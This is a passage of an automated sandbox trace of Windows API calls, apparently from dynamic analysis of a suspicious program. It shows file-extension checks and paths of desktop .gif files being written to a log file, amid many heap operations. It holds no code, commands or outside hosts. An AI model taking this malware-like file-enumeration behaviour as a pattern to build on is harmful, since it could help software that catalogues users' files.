[0164.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.642] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.642] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.642] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.642] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.642] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0164.643] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.643] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0164.644] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.644] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0164.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0164.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.644] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0164.645] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x92a, lpOverlapped=0x0) returned 1 [0164.645] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0164.645] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x92a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.645] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0164.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0164.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif\r\n", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0164.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x59) returned 0x9a5d10 [0164.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif\r\n", cchWideChar=89, lpMultiByteStr=0x9a5d10, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 89 [0164.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0164.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0164.645] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x58, lpOverlapped=0x0) returned 1 [0164.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0164.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.645] CloseHandle (hObject=0x138) returned 1 [0164.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0164.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0164.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0164.653] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0164.653] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0164.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0164.654] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0164.655] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.655] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0164.655] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0164.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0164.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0164.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0164.655] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0164.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0164.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0164.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0164.658] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0164.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 